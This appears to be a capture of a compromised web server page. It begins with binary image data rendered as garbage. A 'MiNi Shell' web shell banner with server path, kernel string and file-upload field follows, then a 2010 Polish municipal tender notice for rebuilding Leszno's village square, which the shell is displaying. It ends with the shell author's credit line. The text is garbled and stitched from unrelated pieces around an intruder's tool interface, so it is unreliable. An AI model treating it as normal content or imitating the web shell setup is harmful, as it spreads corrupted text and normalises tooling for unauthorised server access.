JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/138261-N-2010.html

<p class="kh_header"><b>Leszno: Urządzenie centrum wsi Leszno</b><br>
<b>Numer ogłoszenia: 138261 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leszno , Aleja  Wojska Polskiego 21, 05-084 Leszno, woj. mazowieckie, tel. 022 7258005, 7259035, 7258452, faks 022 7258552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.leszno.bipgminy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie centrum wsi Leszno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zadania pn. Urządzenie centrum wsi Leszno.
2. Zadanie pn. Urządzenie centrum wsi Leszno polega na wykonaniu remontu placu znajdującego się między Al. Wojska Polskiego a ul. Sochaczewską. Na części placu powstanie parking dla samochodów z wjazdem od Al. Wojska Polskiego. Na placu wykonana zostanie powierzchnia 
z  kostki betonowej ozdobnej, kostki betonowej, kostki granitowej, zostaną zamontowane ławki żeliwne ozdobne, latarnie uliczne ozdobne, słupki przeszkodowe ozdobne, maszty flagowe, kosze ozdobne na śmiecie, kraty stalowe. Zostaną usunięte stare drzewna i nasadzone nowe drzewa oraz krzewy ozdobne.
3.Szczegółowy opis przedmiotu Zamówienia znajduje się w Specyfikacji Technicznej wykonania 
i odbioru robót, przedmiarze robót, kosztorysie ofertowym oraz  projekcie budowlanym.
4. Zamawiający zastrzega sobie, aby był zachowany w wykonawstwie oraz zastosowanych materiałach styl retro.
5. Przewiduje się zamontowanie wiaty przystankowej dwumodułowej stalowej ze ścianami ze szkła hartowanego z dachem z polikarbonatu - winna być stylizowana w stylu retro, co ma stanowić właściwe połączenie z zastosowanymi słupami oświetleniowymi ozdobnymi, słupami przeszkodowymi ozdobnymi, ławkami żeliwnymi ozdobnymi, koszami ozdobnymi.
6. Przewiduje się zastosowanie słupów oświetleniowych stylizowanych np. typu P wykonanych 
z rury stalowej zredukowany w maszcie - 2x ramię + 2xoprawa L/D 600/500 typu np. 04MH-70W + 2x lampa HQI-E70.
7. Przewidziana kostka granitowa szara 8/11 winna posiadać przebarwienia beżowe.
8. Przewidywana jest w projekcie kostka betonowa ozdobna gr. 6 cm - dla ciągu pieszego - głównego. Przewiduje się zastosowanie dwóch kolorów kostki tj. koloru Jesieni, natomiast pasy poprzeczne koloru Pastello. Użyte obrzeża powinny być w kolorze kostki ozdobnej.
9. UWAGA!!! Zastosowanie wszystkich materiałów, urządzeń, sprzętu tj. kostek betonowych ozdobnych, kostek betonowych, kostki granitowej, słupków przeszkodowych ozdobnych, ławek żeliwnych ozdobnych, masztów flagowych, słupów oświetleniowych ozdobnych,  lamp-opraw oświetleniowych ozdobnych, koszy ozdobnych na śmiecie, krat stalowych, itp. w przypadku zastosowania innych niż w dokumentacji projektowej  wymaga wcześniejszego przedstawienia Zamawiającemu ofert materiałowych, urządzeń i sprzętu (z atestami i deklaracjami zgodności) w celu uzyskania zatwierdzenia dla wbudowania lub montażu.
Zamawiający, ma prawo dokonać stosownych zmian w zastosowanych materiałach, urządzeniach, sprzęcie w celu uzyskania założonego efektu wizualnego.
Spełnienie w/w wymogów jest podstawą do rozpoczęcia robót. Wykonawca winien w złożonej ofercie dla poszczególnych wycen jednostkowych uwzględnić wszystkie w/w wymogi materiałowe jak i zastosowania właściwych urządzeń i sprzętu, a także walorów ozdobnych.
10. W przypadku materiałów i urządzeń, przy których są podane nazwy techniczne 
w projekcie budowlanym, należy użyć materiały i urządzenia wskazane lub równoważne. 
Wykonawca proponujący inne urządzenia i materiały zobowiązany jest wykazać, że są one równoważne jakościowo i spełniają wymagane projektem normy, parametry i standardy poparte atestami i certyfikatami dopuszczającymi je do obrotu na rynku materiałów budowlanych oraz stosowania w budownictwie. 
Materiały, dla których przewidziano styl retro (ozdobny) przed ich zamontowaniem muszą uzyskać akceptację zamawiającego.
Podane w dokumentacji technicznej (projektowej) typy urządzeń i materiałów oraz Producentów należy traktować jako podane przykładowo i pomocniczo do sporządzania oferty. Kalkulowane przez Wykonawców w ofercie urządzenia i materiały powinny posiadać jednak nie gorsze parametry techniczne i jakościowe od opisanych w projekcie technicznym.
Urządzenia i materiały inne niż proponowane w projekcie będą wymagały na etapie budowy wcześniejszej ich akceptacji przez Zamawiającego przed ich wbudowaniem. 
W celu porównania ofert oraz późniejszych rozliczeń z przyszłym Wykonawcą, Zamawiający nie wymaga, by na etapie przetargu zmieniano opisy pozycji kosztorysów ofertowych 
w przypadku kalkulacji przez Wykonawców urządzeń i materiałów innych Producentów 
(o oznaczeniach typu urządzeń czy materiałów innych niż wymienione w dokumentacji projektowej).

11. ZAMAWIAJĄCY DOPUSZCZA PODWYKONASTWO TYLKO DLA ROBÓT ENERGETYCZNYCH I OGRODNICZYCH..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 24.000,00 zł (słownie: dwadzieścia cztery tysiące zł).
Wadium wnosi się przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają wiedzę i doświadczenie tj. wykonali w okresie ostatnich 5 lat przed upływem 
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
       min. 1 zadanie o wartości min. 1.000.000,00 zł odpowiadające swoim rodzajem 
       robotom stanowiącym przedmiot zamówienia, a w szczególności realizowane ze środków
       przyznawanych z unii europejskiej,
       - posiadają wiedzę i doświadczenie tj. wykonali w okresie ostatnich 5 lat przed upływem 
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
       min. 3 zadania odpowiadające swoim rodzajem robotom stanowiącym przedmiot
       zamówienia, a w szczególności ułożenie nawierzchni jezdni, chodników, ścieków z kostki
       betonowej dla 2 zadań  o powierzchni min. 12.000 m2 każde, dla 1 zadania o powierzchni 
       min. 5.000 m2  ,
       - posiadają wiedzę i doświadczenie tj. wykonali w okresie ostatnich 5 lat przed upływem 
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
       min. 1 zadanie odpowiadające swoim rodzajem robotom stanowiącym przedmiot
       zamówienia, a w szczególności wykonanie robót odwodnieniowych o wartości 
       min. 200.000,00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują osobami zdolnymi do wykonania zamówienia - kierownik budowy 
       posiadający uprawnienia budowlane w zakresie wykonywania robót drogowych. 
       Kierownik ten powinien być członkiem Okręgowej Izby Inżynierów Budownictwa i posiadać 
       ubezpieczenie od odpowiedzialności cywilnej, powinien mieć minimum 5 letnie
      doświadczenie zawodowe,
       - dysponują osobami zdolnymi do wykonania zamówienia - kierownik robót
       posiadający uprawnienia budowlane w zakresie wykonywania robót elektrycznych.  
       Kierownik ten powinien być członkiem Okręgowej Izby Inżynierów Budownictwa i posiadać 
       ubezpieczenie od odpowiedzialności cywilnej, powinien mieć minimum 5 letnie
       doświadczenie zawodowe,
       - dysponują osobami zdolnymi do wykonania zamówienia - kierownik robót 
       posiadający uprawnienia do wykonywania zawodu (np. wykształcenie) w specjalności robót 
       ogrodniczych. Wymagane jest minimum 5 letnie doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonawcy znajdują się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie 
       zamówienia - posiadają opłaconą polisę, a w przypadku jej braku inny dokument 
       potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
       prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum   
       200.000,00 zł. (dokument ten dostarczy tylko wybrany w postępowaniu przetargowym 
      Wykonawca przed podpisaniem umowy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.    Oferta cenowa (załącznik nr 1).
2.    Oświadczenie o spełnieniu warunków określonych na podstawie art. 22 ust.1 ustawy pzp.
3.    Wypełnione kosztorysy ofertowe i kalkulacje.
4.   Wykonawca proponujący inne urządzenia i materiały niż opisane w projekcie budowlanym musi bezwzględnie dołączyć atesty i certyfikaty dopuszczające do obrotu na rynku materiałów budowlanych oraz stosowania w budownictwie, a także karty katalogowe. 
5. Wykonawca proponujący inne urządzenia i materiały niż opisane w projekcie budowlanym musi bezwzględnie dołączyć parametry oraz dane techniczne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki wprowadzania zmian do treści umowy:
         - z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych 
             polegających na niezgodności dokumentacji z przepisami prawa,
         -  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
             proponowanych przez zamawiającego lub wykonawcę , jeżeli te zmiany są korzystne dla 
             zamawiającego.
         -  z powodu wystąpienia dodatkowych okoliczności, niemożliwych do przewidzenia przed
             zawarciem umowy,
         -  z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez 
             czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego 
             bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w dużych 
             rozmiarach,
         -  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie 
             są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.leszno.bipgminy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Al. Wojska Polskiego 21, 05-084 Leszno - pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2010 godzina 10:00, miejsce: Sekretariat Urządu Gminy - pok. nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com